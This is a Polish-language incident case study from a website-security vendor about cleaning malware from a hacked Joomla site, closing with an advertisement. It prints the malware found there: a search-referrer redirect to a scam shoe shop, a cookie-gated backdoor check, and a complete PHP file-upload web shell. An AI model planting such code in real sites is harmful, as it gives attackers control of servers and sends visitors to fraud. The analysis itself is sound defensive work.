Case study - "wirusowy" marketing butów

Popularny model butów Adidas, "wirusowy marketing" oraz niewykrywalny backdoor. Co łączy te 3 rzeczy?

Dwa tygodnie temu zgłosił się do nas klient po pomoc w usunięciu złośliwego oprogramowanie z jego strony i wskazania problemów z bezpieczeństwem witryny. Chcieliśmy zaprosić Was do zapoznania się z naszą analizą.

Strona klienta oparta jest na CMS-ie Joomla i do włamania doszło już jakiś czas temu. Klient w międzyczasie zaktualizował silnik Joomla jak i dostępne pluginy co utrudniło nam wskazanie ze 100% pewnością jak doszło do włamania.

Klient skorzystał z darmowej wersji Webanti, które wskazało poprawnie wykryty malware. Niemożliwe jednak było pełne usunięcie złośliwego oprogramowania bez wiedzy technicznej, ponieważ wirus dopisał się do prawidłowych plików wymaganych do bezbłędnego działania strony.

Podczas wyszukiwania malwaru nasi specjaliści stwierdzili występowanie wirusów w kodzie strony w ponad 20 plikach źródłowych.

Oprócz wirusów w wykonywalnych plikach PHP znaleźliśmy również kod JavaScript. Zadaniem złośliwego kodu było infekowanie osób odwiedzających stronę oraz stworzenie backdoora dla jego twórcy. Nie wykryliśmy żadnych innych błędów więc nie można stwierdzić co więcej chciał zrobić atakujący. Kod wyglądał następująco:


 

 

Dodatkowo, ustalono ciekawy kod, który działał w następujący sposób, że jeśli ktoś odwiedził podany URL z Google’a, binga czy yahoo to był odsyłany do strony yeezyboost350.it  (kod był doklejony do wykupionego szablonu Joomli):

public_html/templates/jsn_epic_pro/error.php

Yeezy Boost 350 to popularny i bardzo drogi model butów marki Adidas zaprojektowany przez Kanye Westa. Jak wynika z doniesień włoskich internautów strona służyla do okradania osób szukających taniego sklepu z tym modelem. Według dat postów scam trwał prawie pół roku. Malware według naszych przypuszczeń miał służyć do zwabiania ofiar do sklepu. Nie znamy skali infekcji więc cięzko nam oszacować jego popularność. Zastanawia natomiast fakt, że był przeznaczony dla stron włoskich, a przedostał się do Polski.

 

 

<script>
var s = document.referrer;
if (s.indexOf("google") > 0 || s.indexOf("bing") > 0 || s.indexOf("yahoo") > 0 || s.indexOf("aol") > 0) {
    self.location = 'http://yeezyboost350.it/';
}</script >

 

Oprócz usunięcia wirusów z pomiędzy poprawnych linii kodu strony Klient poprosił, abyśmy ustalili sposób w jaki do tego doszło.

Jednym z odkrytych przez nas problemów był atak bruteforce na stronę - dość prosty login - admin jak i proste hasło 9 znakowe hasło słownikowe z zakresu [a-zAz0-9] pozwalało na dosyć szybkie jego złamanie. W dziennikach zdarzeń znaleziono ponad 34M zapisu logów łamania hasła.

Dodatkowo na serwerze odnaleźliśmy kopie pliku konfiguracyjnego z zapisanymi dostępami do bazy danych - configuration.php.new - plik ten można było odczytać przez przeglądarkę. Atakujący, którzy pozyskali te dane mogli podłączyć się bezpośrednio do bazy danych i zmienić poszczególne ustawienia.

Dodatkowo, odnaleźliśmy bardzo ciekawy backdoor w pliku public_html/plugins/search/category.php 

Aktywował się on tylko i wyłącznie wtedy, gdy ktoś odwiedził ten zasób i przesłał do niego COOKIE o nazwie 8ee4b0401bff6f374ec2d33c4a0724ec

if (!isset($_COOKIE['8ee4b0401bff6f374ec2d33c4a0724ec'])) {header('HTTP/1.0 404 Not Found');exit;} ?>

Dodatkowo jeśli ktoś już wysłał odpowiednie COOKIE musiał podać odpowiednie hasło, aby móc uruchomić backdoor, który służył zarządzaniu plikami na serwerze klienta.

public_html/tmp/jsn_ext_imageshow_free_j3.6_install/admin/language/admin/de-DE/sitemap.php

<?php print'<form enctype=multipart/form-data method=post><input name=uf type=file><input type=submit name=g>

Kolejnym backdoorem odkrytym przez nas był prosty plik z funkcją uploadu plików. Prosty, lecz bardzo dosyć trudny do wykrycia poprzez antywirusy, ponieważ plik wygląda na całkowicie legalny i występujący na prawie każdej stronie internetowej, Służy on do uploadu plików (np. zdjęcia, załączniki itp.). W tym miejscu musimy pochwalić algorytm Webanti, który bez problemu wykrył powyższy kod uploader i oznaczył go jako zagrożenie.

Kod uploadera:

</form>';if(isset($_POST['g'])){if(is_uploaded_file($_FILES['uf']['tmp_name'])){@copy($_FILES['uf']['tmp_name'],$_FILES['uf']['name']);}}exit;?>

 

Aby potwierdzić nasze słowa, że inne antywirusy miały problem z wykryciem omawianego backdoora uploadera, wrzuciliśmy kod do serwisu VirusTotal, który sprawdził go za pomocą 54 popularnych antywirusów i nie wykrył problemu. Pokazuje to tylko, że Webanti stworzone zostało do wykrywaniu malware na stronach internetowych i z tym radzi sobie doskonale.

Podczas przeprowadzanej analizy bezpieczeństwa strony stwierdziliśmy, że nie jesteśmy w stanie aktualnie wskazać w 100% w jaki sposób doszło do włamania w przeszłości, ponieważ od tamtego czasu Klient zrobił to co wszyscy robią – zaktualizował zarówno pluginy, jak i samą Joomlę. Usunięcie zaatakowanych plików nie pozwoliło na sprawdzenie gdzie były ukryte błędy bezpieczeństwa. W celu ochrony swojej strony warto zainteresować się naszym darmowym skanerem zanim nastąpi pierwszy atak.

Przetestuj darmową ochronę

Jak mówią – lepiej zapobiegać niż leczyć. Dotyczy to także bezpieczeństwa stron internetowych. Każdego roku zwiększa się ilość cyberprzestępstw wynikających z działalności hakerów bądź szkodliwego oprogramowania przez nich tworzonego. Wirusy/malware, ransomware, backdoor – lista zagrożeń jest długa. Na szczęście istnieją skuteczne sposoby zapobiegania im. Sprawdź, jak o bezpieczeństwo Twojej strony zadba Webanti.

Webanti to oprogramowanie antywirusowe, które umożliwia ochronę witryny internetowej w czasie rzeczywistym, a w przypadku próby ataku przez hakerów poinfrmuje właściciela strony.

Jesteś zainteresowany? Narzędzie Webanti możesz przetestować za darmo. W razie pomocy możesz także skorzystać z pomocy naszych konsultantów – 7 dni w tygodniu, przez całą dobę, przez cały rok.

Zaufaj wiedzy specjalistów i zacznij skutecznie chronić swoją stronę – sprawdź Webanti.